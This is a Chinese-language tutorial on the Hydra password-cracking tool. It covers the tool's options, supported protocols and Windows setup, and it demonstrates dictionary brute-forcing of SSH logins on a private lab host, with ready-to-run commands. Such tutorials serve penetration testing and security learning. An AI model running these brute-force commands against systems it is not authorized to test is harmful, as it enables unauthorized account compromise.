密码攻击神器hydra

hydra是黑客组织thc的一款开源密码攻击工具，功能十分强大，支持多种协议的破解，在KALI的终端中执行hydra -h可以看到详细介绍

语法: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

常用参数
Options:
-R 继续从上一次进度接着破解
-I 忽略已破解的文件进行破解
-S 采用SSL链接
-s PORT 指定非默认服务端口
-l LOGIN 指定用户名破解
-L FILE 指定用户名字典
-p PASS 指定密码破解
-P FILE 指定密码字典
-y 爆破中不使用符号
-e nsr "n"尝试空密码, "s"尝试指定密码，"r"反向登录
-C FILE 使用冒号分割格式，例如"登录名:密码"来代替-L/-P参数
-M FILE 每行一条攻击的服务器列表, ':'指定端口
-o FILE 指定结果输出文件
-b FORMAT 为-o FILE输出文件指定输出格式:text(默认), json, jsonv1
-f / -F 找到登录名和密码时停止破解
-t TASKS 设置运行的线程数，默认是16
-w / -W TIME 设置最大超时的时间，单位秒，默认是30s
-c TIME 每次破解等待所有线程的时间
-4 / -6 使用IPv4(默认)或IPv6
-v / -V 显示详细过程
-q 不打印连接失败的信息
-U 服务模块详细使用方法
-h 更多命令行参数介绍
server 目标DNS、IP地址或一个网段
service 要破解的服务名
OPT 一些服务模块的可选参数

支持的协议: adam6500、asterisk、cisco、cisco-enable、cvs、firebird、ftp、ftps、http[s]-{head|get|post}、http[s]-{get|post}-form、http-proxy、http-proxy-urlenum、icq、imap[s]、irc、ldap2[s]、ldap3[-{cram|digest}md5][s]、mssql、mysql、nntp、oracle-listener、oracle-sid、pcanywhere、pcnfs、pop3[s]、postgres、radmin2、rdp、redis、rexec、rlogin、rpcap、rsh、rtsp、s7-300、sip、smb、smtp[s]、smtp-enum、snmp、socks5、ssh、sshkey、svn、teamspeak、telnet[s]、vmauthd、vnc、xmpp

这款工具在KALI中自带，下面是Windows的安装方法
下载完后解压
在桌面新建快捷方式

右键快捷方式-->属性,，修改为

其中起始位置是hydra存放的路径，图标要改的话只需要点击更改图标然后找到hydra.exe就可以换成原始图标

这时我们双击快捷方式，直接输入hydra.exe，可以看到给出了一些使用的帮助信息，-h参数可以看到更详细的帮助。还有一种方法就是添加系统环境变量，这里就不再赘述，有需求可以自行百度

下面演示用hydra破解ssh密码
打开hydra，输入命令：
hydra.exe -l root -P C:\Users\Administrator\Desktop\passwd.txt 192.168.3.119 ssh

-l指定某个用户名，-L可以指定一个用户名文件进行破解；-P指定密码文件破解，-p指定某个密码破解；192.168.3.119是要破解的主机地址；ssh是要破解的协议
回车后开始破解，能否成功取决于字典的大小

可以看到成功破解密码
继续尝试指定用户名文件破解
hydra.exe -L C:\Users\Administrator\Desktop\username.txt -P C:\Users\Administrator\Desktop\passwd.txt 192.168.3.119 ssh

同样成功破解